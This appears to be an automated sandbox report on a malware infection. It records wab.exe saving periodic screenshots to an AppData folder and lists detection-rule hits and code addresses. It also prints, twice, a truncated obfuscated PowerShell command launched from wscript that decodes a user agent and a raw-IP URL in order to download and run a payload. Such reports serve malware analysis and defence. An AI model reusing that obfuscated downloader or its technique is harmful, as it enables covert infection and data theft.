Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175618.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175718.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175818.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_175919.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180019.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180119.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180219.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212214.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212317.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212417.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212518.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212618.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212721.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212822.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_212922.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213025.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213126.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213227.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213330.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213430.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213533.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213634.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213735.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213838.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213939.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214042.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214143.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214247.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194130.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214350.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194230.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214451.dat entropy: 7.99892024752 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194330.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214555.dat entropy: 7.99900846116 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194430.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214658.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194531.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214802.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194631.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214906.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194731.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215010.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194831.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215114.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_194931.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215218.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195031.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215322.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195131.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215429.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195231.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215536.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195331.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215643.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195431.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215753.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195532.dat entropy: 7.99905837886 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215903.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195632.dat entropy: 7.99877097759 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_220023.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195732.dat entropy: 7.99877097759 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_220147.dat entropy: 7.99897665953 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195832.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_195933.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200033.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200133.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180319.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200233.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180419.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200333.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180519.dat entropy: 7.99880335139 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200433.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180619.dat entropy: 7.99888642912 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200533.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180719.dat entropy: 7.9989667577 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200634.dat entropy: 7.99888023558 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180819.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200734.dat entropy: 7.99888023558 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_180920.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200835.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181020.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_200935.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181120.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_201035.dat entropy: 7.99901409683 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240418_181220.dat entropy: 7.99901409683 Jump to dropped file

System Summary

barindex
Source: amsi32_4784.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5768, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4784, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7280
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7280 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7280 Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 26_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00401806 NtdllDefWindowProc_W, 26_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004018C0 NtdllDefWindowProc_W, 26_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004016FD NtdllDefWindowProc_A, 27_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004017B7 NtdllDefWindowProc_A, 27_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00402CAC NtdllDefWindowProc_A, 28_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00402D66 NtdllDefWindowProc_A, 28_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC3AB1A6 11_2_00007FFAAC3AB1A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC3ABF52 11_2_00007FFAAC3ABF52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC3A0EF5 11_2_00007FFAAC3A0EF5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044B040 26_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0043610D 26_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00447310 26_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044A490 26_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040755A 26_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0043C560 26_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044B610 26_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044D6C0 26_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004476F0 26_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044B870 26_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044081D 26_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00414957 26_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004079EE 26_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00407AEB 26_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044AA80 26_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00412AA9 26_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00404B74 26_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00404B03 26_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044BBD8 26_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00404BE5 26_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00404C76 26_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00415CFE 26_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00416D72 26_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00446D30 26_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00446D8B 26_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00406E8F 26_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00405038 27_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0041208C 27_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004050A9 27_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0040511A 27_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0043C13A 27_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004051AB 27_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00449300 27_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0040D322 27_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0044A4F0 27_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0043A5AB 27_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00413631 27_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00446690 27_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0044A730 27_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004398D8 27_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004498E0 27_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0044A886 27_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0043DA09 27_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00438D5E 27_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00449ED0 27_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0041FE83 27_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00430F54 27_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004050C2 28_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004014AB 28_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00405133 28_2_00405133
